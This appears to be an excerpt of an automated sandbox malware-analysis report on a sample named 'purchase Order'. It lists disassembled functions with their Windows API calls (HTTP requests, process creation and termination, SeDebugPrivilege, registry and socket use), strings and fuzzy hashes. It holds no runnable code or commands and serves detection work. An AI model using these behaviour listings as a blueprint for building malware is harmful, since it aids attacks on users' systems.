Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: @U=u$SysListView32
API String ID: 307300125-1908207174
Opcode ID: 088c18e660febd601c72173ab51ae32bf5f9ac719cc5ebd1d0a2f90cc71fce9c
Instruction ID: 85ea32812f799a8f2b2f380d3b1ceaa4d8712e153b99f4cae50b1c6bc8346279
Opcode Fuzzy Hash: 088c18e660febd601c72173ab51ae32bf5f9ac719cc5ebd1d0a2f90cc71fce9c
Instruction Fuzzy Hash: FA41BF71900309ABDB21DFA4DC86FEE77B8EF09354F10042AF699E7291C6719E84DB60

Function 00C945C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C945FF
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00C9462B
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00C9466D
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00C94682
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C9468F
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00C946BF
InternetCloseHandle.WININET(00000000), ref: 00C94706

Part of subcall function 00C95052: GetLastError.KERNEL32(?,?,00C943CC,00000000,00000000,00000001), ref: 00C95067

Strings

, xrefs: 00C946B8

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
String ID:
API String ID: 1241431887-3916222277
Opcode ID: f6fc4d34976096da2fbf2beab82e3728ca7a698de3a95e17ee0aaf56cf6a9a56
Instruction ID: ed8572d91486e830323c0d7162e2db5affe87693ce30bdcd278da7626faa5dca
Opcode Fuzzy Hash: f6fc4d34976096da2fbf2beab82e3728ca7a698de3a95e17ee0aaf56cf6a9a56
Instruction Fuzzy Hash: 51417EB1501209BFEF169F54CC89FBF77ACEF09304F004126FA159A155D7B0DA459BA4

Function 00CA8FC8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00CA8FE7
GetWindowLongW.USER32(015DF168,000000F0), ref: 00CA901A
GetWindowLongW.USER32(015DF168,000000F0), ref: 00CA904F
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00CA9081
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00CA90AB
GetWindowLongW.USER32(00000000,000000F0), ref: 00CA90BC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00CA90D6

Strings

@U=u, xrefs: 00CA8FE7, 00CA9081, 00CA90AB

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID: @U=u
API String ID: 2178440468-2594219639
Opcode ID: 376f0ce9e84e8aaa1dcdd7ade8a80e23c158b9339c6262c90116b4348e1a4c8d
Instruction ID: b65955d30e72cd73ef46cf262a78eb34f2b50af9e68bbf0f99dc6a22650c7d94
Opcode Fuzzy Hash: 376f0ce9e84e8aaa1dcdd7ade8a80e23c158b9339c6262c90116b4348e1a4c8d
Instruction Fuzzy Hash: BF313538600216EFDB20CF58DC86F6937A9FB4A758F154164F629CB2B1CBB2AD40DB51

Function 00C9B644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00CDDC00), ref: 00C9B715
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00CDDC00), ref: 00C9B749
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00C9B8C1
SysFreeString.OLEAUT32(?), ref: 00C9B8EB

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 1936925835c5f24075bab2e7944c0e817621f92e5808dba85eb0e40033a4b6ce
Instruction ID: b4aa9969edbff3511b811b243e3d8b45297446e88194ffdee40762ba896766cf
Opcode Fuzzy Hash: 1936925835c5f24075bab2e7944c0e817621f92e5808dba85eb0e40033a4b6ce
Instruction Fuzzy Hash: D7F11775A00209AFCF04DF94D988EAEB7B9FF89315F108499F915AB250DB31AE41DB90

Function 00CA24D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CA24F5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CA2688
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CA26AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CA26EC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CA270E
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00CA286F
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00CA28A1
CloseHandle.KERNEL32(?), ref: 00CA28D0
CloseHandle.KERNEL32(?), ref: 00CA2947

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: f5e02a3ea05308f71f1d0a10eedb70c5d063b54c0672b263adf74e82d1344118
Instruction ID: 586615ad67ff1f178577428f541041b91aeb6669605601a0a00bbb9c79d50112
Opcode Fuzzy Hash: f5e02a3ea05308f71f1d0a10eedb70c5d063b54c0672b263adf74e82d1344118
Instruction Fuzzy Hash: ADD1CF35604211DFC714EF28C491A6EBBE1FF86314F14846DF89A9B2A2DB30DD45DB52

Function 00C87555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C86EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C85FA6,?), ref: 00C86ED8

Part of subcall function 00C86EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C85FA6,?), ref: 00C86EF1

Part of subcall function 00C872CB: GetFileAttributesW.KERNEL32(?,00C86019), ref: 00C872CC

lstrcmpiW.KERNEL32(?,?), ref: 00C875CA
_wcscmp.LIBCMT ref: 00C875E2
MoveFileW.KERNEL32(?,?), ref: 00C875FB

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 0d1a7454d368dbe4b1230b593ee1dd86cd936fa735fa60c0752a547b65cc8a52
Instruction ID: 7bcc7b36b42570daa86c296ae46d544bd5d9ff99162935b1e49505451b7af07a
Opcode Fuzzy Hash: 0d1a7454d368dbe4b1230b593ee1dd86cd936fa735fa60c0752a547b65cc8a52
Instruction Fuzzy Hash: 8A5132B2A092299ADF61FB94D881DDE73BCAF08314F1041AAFA05E3141EA74D7C5CF64

Function 00C5EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00CBDAD1,00000004,00000000,00000000), ref: 00C5EAEB
ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00CBDAD1,00000004,00000000,00000000), ref: 00C5EB32
ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00CBDAD1,00000004,00000000,00000000), ref: 00CBDC86
ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00CBDAD1,00000004,00000000,00000000), ref: 00CBDCF2

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 5cd289d3e7b473c4d4b13be29a1e8e89cd6f712bfdf73350894b6886033ad6ff
Instruction ID: 4b1a4741fe7313a833df5d7c736722be9ea8a2eaa9709b6242884c0c1d6cc089
Opcode Fuzzy Hash: 5cd289d3e7b473c4d4b13be29a1e8e89cd6f712bfdf73350894b6886033ad6ff
Instruction Fuzzy Hash: 61410378608280DBC73D4B29CD8DB6A7F96AB41307F19081DF8A782561D671BBC8D32C

Function 00C7B263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00C7AEF1,00000B00,?,?), ref: 00C7B26C
HeapAlloc.KERNEL32(00000000,?,00C7AEF1,00000B00,?,?), ref: 00C7B273
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C7AEF1,00000B00,?,?), ref: 00C7B288
GetCurrentProcess.KERNEL32(?,00000000,?,00C7AEF1,00000B00,?,?), ref: 00C7B290
DuplicateHandle.KERNEL32(00000000,?,00C7AEF1,00000B00,?,?), ref: 00C7B293
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00C7AEF1,00000B00,?,?), ref: 00C7B2A3
GetCurrentProcess.KERNEL32(00C7AEF1,00000000,?,00C7AEF1,00000B00,?,?), ref: 00C7B2AB
DuplicateHandle.KERNEL32(00000000,?,00C7AEF1,00000B00,?,?), ref: 00C7B2AE
CreateThread.KERNEL32(00000000,00000000,00C7B2D4,00000000,00000000,00000000), ref: 00C7B2C8

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 08ddb8711467718b7900cc1151d541c8b1001615f7232276239e8afb5a8038cf
Instruction ID: b42aa902c406e97baa44cf8733c8f0121f035e233fc9e31370eca6bd4317b9f8
Opcode Fuzzy Hash: 08ddb8711467718b7900cc1151d541c8b1001615f7232276239e8afb5a8038cf
Instruction Fuzzy Hash: BF01B6B5240348BFE710ABA5DC4AF6F7BACEB88711F058425FA06DB1A1CA74D801CB61

Function 00C9C43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00C9C49E
NULL Pointer assignment, xrefs: 00C9C876, 00C9C887

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: c50ae97d05d542c9f7830c8b00a435eec10e3b4e786422218a72d3aa58c96f65
Instruction ID: 0848378f4b7349de71f89108de65bf6583ed497f1b52a8fcee59d8d88dd61911
Opcode Fuzzy Hash: c50ae97d05d542c9f7830c8b00a435eec10e3b4e786422218a72d3aa58c96f65
Instruction Fuzzy Hash: B5E1C071A0021AAFDF14DFA8C8C9BAE77B5EF48354F148029F915AB281D770EE41DB94

Function 00C9BB08 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C9BB5C
VariantInit.OLEAUT32(?), ref: 00C9BC2D
VariantInit.OLEAUT32(?), ref: 00C9BD2E
VariantClear.OLEAUT32(?), ref: 00C9BD38
VariantClear.OLEAUT32(?), ref: 00C9BD99

Strings

Null Object assignment in FOR..IN loop, xrefs: 00C9BBBD, 00C9BCEB, 00C9BDA7
Incorrect Object type in FOR..IN loop, xrefs: 00C9BD11

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 37e991b0211bf438d5953cadd29ebd5bd1f873437b6bda360eb7cfad7ed083b9
Instruction ID: f1e515487d5760d9aa88123724bfac6cbcc5d4e937698e1b4700193ed97d3898
Opcode Fuzzy Hash: 37e991b0211bf438d5953cadd29ebd5bd1f873437b6bda360eb7cfad7ed083b9
Instruction Fuzzy Hash: 5591AF71A00219BBDF24CFA5D948FAEBBB8EF45710F108169F515AB284DB709E44CFA0

Function 00CA172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Part of subcall function 00C86532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00C86554
Part of subcall function 00C86532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00C86564
Part of subcall function 00C86532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00C865F9

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CA179A
GetLastError.KERNEL32 ref: 00CA17AD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CA17D9
TerminateProcess.KERNEL32(00000000,00000000), ref: 00CA1855
GetLastError.KERNEL32(00000000), ref: 00CA1860
CloseHandle.KERNEL32(00000000), ref: 00CA1895

Strings

SeDebugPrivilege, xrefs: 00CA17B8

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: ac153f26c21e6848b65d602d693df3d61c4459cb4c4ee1610cbb9360ed272585
Instruction ID: 9800b536924d3ce786a93eb3d2906b1cf0a05fbf302cca31eca7c984c65539c4
Opcode Fuzzy Hash: ac153f26c21e6848b65d602d693df3d61c4459cb4c4ee1610cbb9360ed272585
Instruction Fuzzy Hash: 8B41F171600201AFDB05EF94CCD5F6EB7A1AF45314F098068F9069F2D2DB78AA44DB95

Function 00CAE397 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 108windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00D01628,00000000,00D01628,00000000,00000000,00D01628,?,00CBDC5D,00000000,?,00000000,00000000,00000000,?,00CBDAD1,00000004), ref: 00CAE40B
EnableWindow.USER32(00000000,00000000), ref: 00CAE42F
ShowWindow.USER32(00D01628,00000000), ref: 00CAE48F
ShowWindow.USER32(00000000,00000004), ref: 00CAE4A1
EnableWindow.USER32(00000000,00000001), ref: 00CAE4C5
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00CAE4E8

Strings

@U=u, xrefs: 00CAE4E8

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID: @U=u
API String ID: 642888154-2594219639
Opcode ID: 89fb3a228636bce914bc23e32200c8d2570bdd556784578efdfa7ac153ef0428
Instruction ID: 1c0e8aa883314d4f1bf33211a833c64db00e99740e075277e6bca6060742dedb
Opcode Fuzzy Hash: 89fb3a228636bce914bc23e32200c8d2570bdd556784578efdfa7ac153ef0428
Instruction Fuzzy Hash: DF416335601142EFDB21CF64C499F947BE5BF4A308F1845B9FA698F1A2C731E942CB91

Function 00C85819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00C858B8

Strings

warning, xrefs: 00C858A1
blank, xrefs: 00C8583A
question, xrefs: 00C85871
info, xrefs: 00C85859
stop, xrefs: 00C85889

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 45b48305fc0a06b73d2e623da8a9d7be4cdee0493d67ae29a557af8510ce1081
Instruction ID: 330bc39b86838bea539bbb688735c94351fa6bd6363cbcfd16ec8a4fa61d5139
Opcode Fuzzy Hash: 45b48305fc0a06b73d2e623da8a9d7be4cdee0493d67ae29a557af8510ce1081
Instruction Fuzzy Hash: 0111E736649746FAE7156B959C82DAB339CAF15328B30003BF611F62C1E7F0AA00576E

Function 00C8A729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00C8A806

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 280ee0243d7e5c04c6175b83a35a76c6eacd0e52b75554aa2ec389a23a20acc4
Instruction ID: aeeef5466508be8aa529887e4551e332578d2fa8d61c4d8c37f51cba5ebb1937
Opcode Fuzzy Hash: 280ee0243d7e5c04c6175b83a35a76c6eacd0e52b75554aa2ec389a23a20acc4
Instruction Fuzzy Hash: C5C17D75904219DFEB04EF94C481BEEB7F4EF08319F24406AE616E7241D734AA82DF99

Function 00C86B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C86B63
LoadStringW.USER32(00000000), ref: 00C86B6A
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C86B80
LoadStringW.USER32(00000000), ref: 00C86B87
_wprintf.LIBCMT ref: 00C86BAD
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C86BCB

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00C86BA8

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 15b0ae6d2b11e41ca769ec0de6a37c213d7697193866ee850004b30c0751d576
Instruction ID: 8b5c52ed138be4e216399a26b6c2cb165b6d131625c286234e258e5a2cfbdad8
Opcode Fuzzy Hash: 15b0ae6d2b11e41ca769ec0de6a37c213d7697193866ee850004b30c0751d576
Instruction Fuzzy Hash: E9011DF6900208BFEB11ABA4DD89FFA776CDB08309F0444A1F746E6041EA749E858B75

Function 00CA2B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CA3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CA2BB5,?,?), ref: 00CA3C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CA2BF6

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper
String ID:
API String ID: 2595220575-0
Opcode ID: 564a5dcb85ab7ccdccab5cf4bb5de8ec89e9b7e75964dfa286b7d65214a9bb4d
Instruction ID: 0cb6c7864e48462d627e4b69b7a1c5629990c4341d6278f7baf6ef0b10edd7fc
Opcode Fuzzy Hash: 564a5dcb85ab7ccdccab5cf4bb5de8ec89e9b7e75964dfa286b7d65214a9bb4d
Instruction Fuzzy Hash: 2191AB716042029FDB00EF58C891F6EB7E5FF89318F04881DF996972A2DB34E945DB46

Function 00C995BF Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON

Download Yara Rule

APIs

select.WSOCK32 ref: 00C99691
WSAGetLastError.WSOCK32(00000000), ref: 00C9969E
__WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 00C996C8
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00C996E9
WSAGetLastError.WSOCK32(00000000), ref: 00C996F8
htons.WSOCK32(?,?,?,00000000,?), ref: 00C997AA
inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,00CDDC00), ref: 00C99765

Part of subcall function 00C7D2FF: _strlen.LIBCMT ref: 00C7D309

